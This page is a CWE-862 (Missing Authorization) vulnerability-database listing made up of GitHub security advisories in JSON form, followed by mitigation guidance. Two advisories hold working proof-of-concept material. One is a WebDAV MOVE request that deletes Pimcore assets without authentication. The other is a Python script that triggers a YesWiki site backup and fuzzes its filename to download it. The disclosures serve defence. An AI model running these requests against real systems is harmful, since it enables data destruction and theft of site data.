CWE-862
Allowed-with-ReviewMissing Authorization
Abstraction: Class · Status: Incomplete
The product does not perform an authorization check when an actor attempts to access a resource or perform an action.
14579 vulnerabilities reference this CWE, most recent first.
GHSA-WC5V-66FR-QMW9
Vulnerability from github – Published: 2024-04-08 15:30 – Updated: 2024-11-19 21:31TOTOLINK EX200 V4.0.3c.7646_B20201211 does not contain an authentication mechanism by default.
{
"affected": [],
"aliases": [
"CVE-2024-31813"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-04-08T13:15:08Z",
"severity": "HIGH"
},
"details": "TOTOLINK EX200 V4.0.3c.7646_B20201211 does not contain an authentication mechanism by default.",
"id": "GHSA-wc5v-66fr-qmw9",
"modified": "2024-11-19T21:31:30Z",
"published": "2024-04-08T15:30:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31813"
},
{
"type": "WEB",
"url": "https://github.com/4hsien/CVE-vulns/blob/main/TOTOLINK/EX200/Missing_Authentication/missauth.md"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WC7J-G8WX-M2QX
Vulnerability from github – Published: 2026-05-27 17:17 – Updated: 2026-07-10 19:08Summary
Pimcore's WebDAV asset endpoint exposes a MOVE operation through /asset/webdav{path} without adding an authentication plugin in the WebDAV controller. The Tree::move() implementation then performs asset mutation and deletion before checking a current Pimcore user or any asset permissions.
An unauthenticated remote attacker who knows two existing asset paths in the same directory can send a WebDAV MOVE request that deletes the source asset. Authenticated low-privileged users may also be able to perform unauthorized asset move or overwrite operations because the move path does not enforce rename, delete, create, or publish permissions.
Details
The route for WebDAV is globally registered and accepts arbitrary trailing paths:
# bundles/CoreBundle/config/routing.yaml
pimcore_webdav:
path: /asset/webdav{path}
defaults: { _controller: Pimcore\Bundle\CoreBundle\Controller\WebDavController::webdavAction }
requirements:
path: '.*'
The controller constructs a SabreDAV server but only attaches lock and browser plugins. It does not attach an authentication plugin or perform an explicit user/session check before starting the server:
# bundles/CoreBundle/src/Controller/WebDavController.php
$publicDir = new Asset\WebDAV\Folder($homeDir);
$objectTree = new Asset\WebDAV\Tree($publicDir);
$server = new \Sabre\DAV\Server($objectTree);
$server->setBaseUri($this->generateUrl('pimcore_webdav', ['path' => '/']));
$server->addPlugin($lockPlugin);
$server->addPlugin(new \Sabre\DAV\Browser\Plugin());
$server->start();
Most WebDAV file and folder operations perform permission checks through isAllowed(), but Tree::move() does not. In the overwrite path for a same-directory move, it deletes the source asset before resolving the current user:
# models/Asset/WebDAV/Tree.php
if (dirname($sourcePath) == dirname($destinationPath)) {
if ($asset = Asset::getByPath('/' . $destinationPath)) {
$sourceAsset = Asset::getByPath('/' . $sourcePath);
$asset->setData($sourceAsset->getData());
$sourceAsset->delete();
}
...
}
$user = \Pimcore\Tool\Admin::getCurrentUser();
$asset->setUserModification($user->getId());
$asset->save();
Asset::delete() removes the asset without an internal permission gate:
# models/Asset.php
public function delete(bool $isNested = false): void
{
...
$this->getDao()->delete();
...
$this->deletePhysicalFile();
}
Because the source asset deletion happens before $user->getId(), an unauthenticated request can still cause a deletion even if later execution fails when no current user is present.
PoC
Prerequisites:
- Pimcore 2026.1.0 with the built-in WebDAV route enabled.
- Two existing asset paths in the same directory, for example
/products/source.jpgand/products/existing.jpg. - No valid session is required for the unauthenticated deletion path.
PoC request:
MOVE /asset/webdav/products/source.jpg HTTP/1.1
Host: target.example
Destination: http://target.example/asset/webdav/products/existing.jpg
Overwrite: T
Result:
The server will return an error after the deletion because Tree::move() later attempts to call $user->getId() when no current user exists. However, the source asset at /products/source.jpg has already been deleted by $sourceAsset->delete() before that failure point.
For an authenticated low-privileged backend user without sufficient asset permissions, the same request can also reach the unchecked move path and may overwrite the destination asset or move an asset without the expected per-asset permission checks.
Impact
This issue allows remote unauthorized destruction of assets when paths are known or guessable. In Pimcore deployments where assets represent product images, documents, media, or DAM-managed business content, deletion or unauthorized overwrite can cause data loss, content integrity loss, and service disruption.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.3.6"
},
"package": {
"ecosystem": "Packagist",
"name": "pimcore/pimcore"
},
"ranges": [
{
"events": [
{
"introduced": "12.0.0-RC1"
},
{
"fixed": "12.3.7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "pimcore/pimcore"
},
"ranges": [
{
"events": [
{
"introduced": "2026.1.0"
},
{
"fixed": "2026.1.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 11.5.16"
},
"package": {
"ecosystem": "Packagist",
"name": "pimcore/pimcore"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "11.5.17"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-45260"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-27T17:17:18Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\nPimcore\u0027s WebDAV asset endpoint exposes a `MOVE` operation through `/asset/webdav{path}` without adding an authentication plugin in the WebDAV controller. The `Tree::move()` implementation then performs asset mutation and deletion before checking a current Pimcore user or any asset permissions.\n\nAn unauthenticated remote attacker who knows two existing asset paths in the same directory can send a WebDAV `MOVE` request that deletes the source asset. Authenticated low-privileged users may also be able to perform unauthorized asset move or overwrite operations because the move path does not enforce `rename`, `delete`, `create`, or `publish` permissions.\n\n### Details\nThe route for WebDAV is globally registered and accepts arbitrary trailing paths:\n\n```yaml\n# bundles/CoreBundle/config/routing.yaml\npimcore_webdav:\n path: /asset/webdav{path}\n defaults: { _controller: Pimcore\\Bundle\\CoreBundle\\Controller\\WebDavController::webdavAction }\n requirements:\n path: \u0027.*\u0027\n```\n\nThe controller constructs a SabreDAV server but only attaches lock and browser plugins. It does not attach an authentication plugin or perform an explicit user/session check before starting the server:\n\n```php\n# bundles/CoreBundle/src/Controller/WebDavController.php\n$publicDir = new Asset\\WebDAV\\Folder($homeDir);\n$objectTree = new Asset\\WebDAV\\Tree($publicDir);\n$server = new \\Sabre\\DAV\\Server($objectTree);\n$server-\u003esetBaseUri($this-\u003egenerateUrl(\u0027pimcore_webdav\u0027, [\u0027path\u0027 =\u003e \u0027/\u0027]));\n$server-\u003eaddPlugin($lockPlugin);\n$server-\u003eaddPlugin(new \\Sabre\\DAV\\Browser\\Plugin());\n$server-\u003estart();\n```\n\nMost WebDAV file and folder operations perform permission checks through `isAllowed()`, but `Tree::move()` does not. In the overwrite path for a same-directory move, it deletes the source asset before resolving the current user:\n\n```php\n# models/Asset/WebDAV/Tree.php\nif (dirname($sourcePath) == dirname($destinationPath)) {\n if ($asset = Asset::getByPath(\u0027/\u0027 . $destinationPath)) {\n $sourceAsset = Asset::getByPath(\u0027/\u0027 . $sourcePath);\n $asset-\u003esetData($sourceAsset-\u003egetData());\n $sourceAsset-\u003edelete();\n }\n ...\n}\n\n$user = \\Pimcore\\Tool\\Admin::getCurrentUser();\n$asset-\u003esetUserModification($user-\u003egetId());\n$asset-\u003esave();\n```\n\n`Asset::delete()` removes the asset without an internal permission gate:\n\n```php\n# models/Asset.php\npublic function delete(bool $isNested = false): void\n{\n ...\n $this-\u003egetDao()-\u003edelete();\n ...\n $this-\u003edeletePhysicalFile();\n}\n```\n\nBecause the source asset deletion happens before `$user-\u003egetId()`, an unauthenticated request can still cause a deletion even if later execution fails when no current user is present.\n\n### PoC\nPrerequisites:\n\n- Pimcore 2026.1.0 with the built-in WebDAV route enabled.\n- Two existing asset paths in the same directory, for example `/products/source.jpg` and `/products/existing.jpg`.\n- No valid session is required for the unauthenticated deletion path.\n\nPoC request:\n\n```http\nMOVE /asset/webdav/products/source.jpg HTTP/1.1\nHost: target.example\nDestination: http://target.example/asset/webdav/products/existing.jpg\nOverwrite: T\n```\n\nResult:\n\nThe server will return an error after the deletion because `Tree::move()` later attempts to call `$user-\u003egetId()` when no current user exists. However, the source asset at `/products/source.jpg` has already been deleted by `$sourceAsset-\u003edelete()` before that failure point.\n\nFor an authenticated low-privileged backend user without sufficient asset permissions, the same request can also reach the unchecked move path and may overwrite the destination asset or move an asset without the expected per-asset permission checks.\n\n### Impact\nThis issue allows remote unauthorized destruction of assets when paths are known or guessable. In Pimcore deployments where assets represent product images, documents, media, or DAM-managed business content, deletion or unauthorized overwrite can cause data loss, content integrity loss, and service disruption.",
"id": "GHSA-wc7j-g8wx-m2qx",
"modified": "2026-07-10T19:08:21Z",
"published": "2026-05-27T17:17:18Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pimcore/pimcore/security/advisories/GHSA-wc7j-g8wx-m2qx"
},
{
"type": "WEB",
"url": "https://github.com/pimcore/pimcore/pull/19120"
},
{
"type": "WEB",
"url": "https://github.com/pimcore/pimcore/commit/9d7c77fd9b19fa011ce470de95d4438e65007d99"
},
{
"type": "PACKAGE",
"url": "https://github.com/pimcore/pimcore"
},
{
"type": "WEB",
"url": "https://github.com/pimcore/pimcore/releases/tag/v12.3.7"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Pimcore: Missing Authorization in WebDAV MOVE via unchecked asset move handling"
}
GHSA-WC9C-673F-726H
Vulnerability from github – Published: 2025-09-10 09:30 – Updated: 2025-09-10 09:30The WP Import – Ultimate CSV XML Importer for WordPress plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_ftp_details' AJAX action in all versions up to, and including, 7.27. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve a configured set of SFTP/FTP credentials.
{
"affected": [],
"aliases": [
"CVE-2025-10040"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-10T07:15:43Z",
"severity": "HIGH"
},
"details": "The WP Import \u2013 Ultimate CSV XML Importer for WordPress plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the \u0027get_ftp_details\u0027 AJAX action in all versions up to, and including, 7.27. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve a configured set of SFTP/FTP credentials.",
"id": "GHSA-wc9c-673f-726h",
"modified": "2025-09-10T09:30:57Z",
"published": "2025-09-10T09:30:57Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10040"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/wp-ultimate-csv-importer/tags/7.26/uploadModules/FtpUpload.php#L231"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/3357936/wp-ultimate-csv-importer/trunk/uploadModules/FtpUpload.php"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9bcdcaa4-c492-4d79-8d18-44802abd02e7?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-WC9G-6J9W-HR95
Vulnerability from github – Published: 2025-04-29 14:41 – Updated: 2025-04-30 17:26Summary
The request to commence a site backup can be performed without authentication. Then these backups can also be downloaded without authentication.
The archives are created with a predictable filename, so a malicious user could create an archive and then download the archive without being authenticated.
Details
Create an installation using the instructions found in the docker folder of the repository, setup the site, and then send the request to create an archive, which you do not need to be authenticated for:
POST /?api/archives HTTP/1.1
Host: localhost:8085
action=startArchive¶ms%5Bsavefiles%5D=true¶ms%5Bsavedatabase%5D=true&callAsync=true
Then to retrieve it, make a simple GET request like to the correct URL:
http://localhost:8085/?api/archives/2025-04-12T14-34-01_archive.zip
A malicious attacker could simply fuzz this filename.
PoC
Here is a python script to fuzz this:
#!/usr/bin/env python3
import requests
import argparse
import datetime
import time
from urllib.parse import urljoin
from email.utils import parsedate_to_datetime
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Hardcoded proxy config for Burp Suite
BURP_PROXIES = {
"http": "http://127.0.0.1:8080",
"https": "http://127.0.0.1:8080"
}
def send_post_request(base_url, use_proxy=False):
url = urljoin(base_url, "/?api/archives")
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36",
}
data = {
"action": "startArchive",
"params[savefiles]": "true",
"params[savedatabase]": "true",
"callAsync": "true"
}
proxies = BURP_PROXIES if use_proxy else None
response = requests.post(url, headers=headers, data=data, proxies=proxies, verify=False)
print(f"[+] Archive start response code: {response.status_code}")
server_date = response.headers.get("Date")
if server_date:
ts = parsedate_to_datetime(server_date)
print(f"[✓] Server time (from Date header): {ts.strftime('%Y-%m-%d %H:%M:%S')} UTC")
return ts
else:
print("[!] Server did not return a Date header, falling back to local UTC.")
return datetime.datetime.utcnow()
def try_download_files(base_url, timestamp, use_proxy=False):
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36",
}
proxies = BURP_PROXIES if use_proxy else None
print("[*] Trying to download the archive with timestamp fuzzing (±10 seconds)...")
base_ts = timestamp + datetime.timedelta(hours=2)
time.sleep(30) # delay to generate the archive
for offset in range(-4, 15):
ts = base_ts + datetime.timedelta(seconds=offset)
filename = ts.strftime("%Y-%m-%dT%H-%M-%S_archive.zip")
url = urljoin(base_url, f"/?api/archives/{filename}")
print(f"[>] Trying: {url}")
r = requests.get(url, headers=headers, proxies=proxies, verify=False)
if r.status_code == 200 and r.headers.get("Content-Type", "").startswith("application/zip"):
print(f"[✓] Archive found and downloaded: {filename}")
with open(filename, "wb") as f:
f.write(r.content)
return
print("[!] No archive found within the fuzzed window.")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Trigger archive and fetch resulting file with timestamp fuzzing.")
parser.add_argument("host", help="Base host URL, e.g., http://localhost:8085")
parser.add_argument("-p", "--proxy", action="store_true", help="Route requests through Burp Suite proxy at 127.0.0.1:8080")
args = parser.parse_args()
ts = send_post_request(args.host, use_proxy=args.proxy)
print(f"[+] Archive request sent at (UTC): {ts.strftime('%Y-%m-%d %H:%M:%S')}")
try_download_files(args.host, ts, use_proxy=args.proxy)
Impact
Denial of Service - A malicious attacker could simply make numerous requests to create archives and fill up the file system with archives.
Site Compromise - A malicious attacker can download the archive which will contain sensitive site information.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.5.3"
},
"package": {
"ecosystem": "Packagist",
"name": "yeswiki/yeswiki"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.5.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-46348"
],
"database_specific": {
"cwe_ids": [
"CWE-287",
"CWE-862"
],
"github_reviewed": true,
"github_reviewed_at": "2025-04-29T14:41:31Z",
"nvd_published_at": "2025-04-29T21:15:52Z",
"severity": "CRITICAL"
},
"details": "### Summary\n\nThe request to commence a site backup can be performed without authentication. Then these backups can also be downloaded without authentication. \n\nThe archives are created with a predictable filename, so a malicious user could create an archive and then download the archive without being authenticated. \n\n### Details\n\nCreate an installation using the instructions found in the docker folder of the repository, setup the site, and then send the request to create an archive, which you do not need to be authenticated for: \n\n```\nPOST /?api/archives HTTP/1.1\nHost: localhost:8085\n\naction=startArchive\u0026params%5Bsavefiles%5D=true\u0026params%5Bsavedatabase%5D=true\u0026callAsync=true\n```\nThen to retrieve it, make a simple `GET` request like to the correct URL: \n```\nhttp://localhost:8085/?api/archives/2025-04-12T14-34-01_archive.zip\n```\nA malicious attacker could simply fuzz this filename.\n\n### PoC\nHere is a python script to fuzz this: \n\n```\n#!/usr/bin/env python3\n\nimport requests\nimport argparse\nimport datetime\nimport time\nfrom urllib.parse import urljoin\nfrom email.utils import parsedate_to_datetime\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n# Hardcoded proxy config for Burp Suite\nBURP_PROXIES = {\n \"http\": \"http://127.0.0.1:8080\",\n \"https\": \"http://127.0.0.1:8080\"\n}\n\ndef send_post_request(base_url, use_proxy=False):\n url = urljoin(base_url, \"/?api/archives\")\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36\",\n }\n\n data = {\n \"action\": \"startArchive\",\n \"params[savefiles]\": \"true\",\n \"params[savedatabase]\": \"true\",\n \"callAsync\": \"true\"\n }\n\n proxies = BURP_PROXIES if use_proxy else None\n response = requests.post(url, headers=headers, data=data, proxies=proxies, verify=False)\n print(f\"[+] Archive start response code: {response.status_code}\")\n\n server_date = response.headers.get(\"Date\")\n if server_date:\n ts = parsedate_to_datetime(server_date)\n print(f\"[\u2713] Server time (from Date header): {ts.strftime(\u0027%Y-%m-%d %H:%M:%S\u0027)} UTC\")\n return ts\n else:\n print(\"[!] Server did not return a Date header, falling back to local UTC.\")\n return datetime.datetime.utcnow()\n\ndef try_download_files(base_url, timestamp, use_proxy=False):\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36\",\n }\n\n proxies = BURP_PROXIES if use_proxy else None\n print(\"[*] Trying to download the archive with timestamp fuzzing (\u00b110 seconds)...\")\n\n base_ts = timestamp + datetime.timedelta(hours=2)\n\n time.sleep(30) # delay to generate the archive\n\n for offset in range(-4, 15):\n ts = base_ts + datetime.timedelta(seconds=offset)\n filename = ts.strftime(\"%Y-%m-%dT%H-%M-%S_archive.zip\")\n url = urljoin(base_url, f\"/?api/archives/{filename}\")\n print(f\"[\u003e] Trying: {url}\")\n r = requests.get(url, headers=headers, proxies=proxies, verify=False)\n\n if r.status_code == 200 and r.headers.get(\"Content-Type\", \"\").startswith(\"application/zip\"):\n print(f\"[\u2713] Archive found and downloaded: {filename}\")\n with open(filename, \"wb\") as f:\n f.write(r.content)\n return\n\n print(\"[!] No archive found within the fuzzed window.\")\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Trigger archive and fetch resulting file with timestamp fuzzing.\")\n parser.add_argument(\"host\", help=\"Base host URL, e.g., http://localhost:8085\")\n parser.add_argument(\"-p\", \"--proxy\", action=\"store_true\", help=\"Route requests through Burp Suite proxy at 127.0.0.1:8080\")\n args = parser.parse_args()\n\n ts = send_post_request(args.host, use_proxy=args.proxy)\n print(f\"[+] Archive request sent at (UTC): {ts.strftime(\u0027%Y-%m-%d %H:%M:%S\u0027)}\")\n\n try_download_files(args.host, ts, use_proxy=args.proxy)\n```\n\n### Impact\n\nDenial of Service - A malicious attacker could simply make numerous requests to create archives and fill up the file system with archives. \n\nSite Compromise - A malicious attacker can download the archive which will contain sensitive site information.",
"id": "GHSA-wc9g-6j9w-hr95",
"modified": "2025-04-30T17:26:00Z",
"published": "2025-04-29T14:41:31Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/YesWiki/yeswiki/security/advisories/GHSA-wc9g-6j9w-hr95"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46348"
},
{
"type": "WEB",
"url": "https://github.com/YesWiki/yeswiki/commit/0d4efc880a727599fa4f6d7a64cc967afe475530"
},
{
"type": "PACKAGE",
"url": "https://github.com/YesWiki/yeswiki"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "YesWiki Vulnerable to Unauthenticated Site Backup Creation and Download"
}
GHSA-WCCC-M55J-R27W
Vulnerability from github – Published: 2025-04-01 15:31 – Updated: 2026-04-01 18:34Missing Authorization vulnerability in WebProtect.ai Astra Security Suite allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Astra Security Suite: from n/a through 0.2.
{
"affected": [],
"aliases": [
"CVE-2025-31774"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-04-01T15:16:14Z",
"severity": "MODERATE"
},
"details": "Missing Authorization vulnerability in WebProtect.ai Astra Security Suite allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Astra Security Suite: from n/a through 0.2.",
"id": "GHSA-wccc-m55j-r27w",
"modified": "2026-04-01T18:34:20Z",
"published": "2025-04-01T15:31:40Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-31774"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/plugin/getastra/vulnerability/wordpress-astra-security-suite-plugin-0-2-broken-access-control-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-WCF9-G27P-CXR6
Vulnerability from github – Published: 2026-01-22 18:30 – Updated: 2026-01-29 03:31Missing Authorization vulnerability in merkulove Comparimager for Elementor comparimager-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Comparimager for Elementor: from n/a through <= 1.0.1.
{
"affected": [],
"aliases": [
"CVE-2025-66142"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-01-22T17:16:01Z",
"severity": "MODERATE"
},
"details": "Missing Authorization vulnerability in merkulove Comparimager for Elementor comparimager-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Comparimager for Elementor: from n/a through \u003c= 1.0.1.",
"id": "GHSA-wcf9-g27p-cxr6",
"modified": "2026-01-29T03:31:26Z",
"published": "2026-01-22T18:30:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66142"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/Wordpress/Plugin/comparimager-elementor/vulnerability/wordpress-comparimager-for-elementor-plugin-1-0-1-broken-access-control-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-WCFR-CG3H-82R8
Vulnerability from github – Published: 2025-04-01 15:31 – Updated: 2026-04-01 18:34Missing Authorization vulnerability in BeastThemes Clockinator Lite allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Clockinator Lite: from n/a through 1.0.7.
{
"affected": [],
"aliases": [
"CVE-2025-31777"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-04-01T15:16:15Z",
"severity": "MODERATE"
},
"details": "Missing Authorization vulnerability in BeastThemes Clockinator Lite allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Clockinator Lite: from n/a through 1.0.7.",
"id": "GHSA-wcfr-cg3h-82r8",
"modified": "2026-04-01T18:34:20Z",
"published": "2025-04-01T15:31:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-31777"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/plugin/clockify-lite/vulnerability/wordpress-clockinator-lite-plugin-1-0-7-broken-access-control-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-WCJF-C77R-W723
Vulnerability from github – Published: 2024-11-01 15:31 – Updated: 2024-11-01 15:31Missing Authorization vulnerability in ReviewX allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects ReviewX: from n/a through 1.6.28.
{
"affected": [],
"aliases": [
"CVE-2024-43323"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-11-01T15:15:47Z",
"severity": "MODERATE"
},
"details": "Missing Authorization vulnerability in ReviewX allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects ReviewX: from n/a through 1.6.28.",
"id": "GHSA-wcjf-c77r-w723",
"modified": "2024-11-01T15:31:59Z",
"published": "2024-11-01T15:31:59Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43323"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/vulnerability/reviewx/wordpress-reviewx-plugin-1-6-28-broken-access-control-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-WCM8-F742-J3XH
Vulnerability from github – Published: 2026-03-21 06:30 – Updated: 2026-03-21 06:30The Hr Press Lite plugin for WordPress is vulnerable to unauthorized access of sensitive employee data due to a missing capability check on the hrp-fetch-employees AJAX action in all versions up to, and including, 1.0.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve sensitive employee information including names, email addresses, phone numbers, salary/pay rates, employment dates, and employment status.
{
"affected": [],
"aliases": [
"CVE-2026-2720"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-21T04:17:11Z",
"severity": "MODERATE"
},
"details": "The Hr Press Lite plugin for WordPress is vulnerable to unauthorized access of sensitive employee data due to a missing capability check on the `hrp-fetch-employees` AJAX action in all versions up to, and including, 1.0.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve sensitive employee information including names, email addresses, phone numbers, salary/pay rates, employment dates, and employment status.",
"id": "GHSA-wcm8-f742-j3xh",
"modified": "2026-03-21T06:30:24Z",
"published": "2026-03-21T06:30:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2720"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/hr-press-lite/tags/1.0.2/admin/admin.php#L36"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/hr-press-lite/tags/1.0.2/includes/HRP_Action.php#L1444"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/hr-press-lite/trunk/admin/admin.php#L36"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/hr-press-lite/trunk/includes/HRP_Action.php#L1444"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d2a63b8e-e16e-4702-be1b-acc5c3e74b22?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-WCMH-GHJH-4J2H
Vulnerability from github – Published: 2024-03-07 06:30 – Updated: 2024-08-12 21:31nGrinder before 3.5.9 allows an attacker to obtain the results of webhook requests due to lack of access control, which could be the cause of information disclosure and limited Server-Side Request Forgery.
{
"affected": [],
"aliases": [
"CVE-2024-28216"
],
"database_specific": {
"cwe_ids": [
"CWE-284",
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-03-07T05:15:55Z",
"severity": "MODERATE"
},
"details": "nGrinder before 3.5.9 allows an attacker to obtain the results of webhook requests due to lack of access control, which could be the cause of information disclosure and limited Server-Side Request Forgery.",
"id": "GHSA-wcmh-ghjh-4j2h",
"modified": "2024-08-12T21:31:32Z",
"published": "2024-03-07T06:30:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28216"
},
{
"type": "WEB",
"url": "https://cve.naver.com/detail/cve-2024-28216.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
Mitigation
- Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.
- Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
Mitigation
Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].
Mitigation MIT-4.4
Strategy: Libraries or Frameworks
- Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
- For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].
Mitigation
- For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.
- One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.
Mitigation
Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.
CAPEC-665: Exploitation of Thunderbolt Protection Flaws
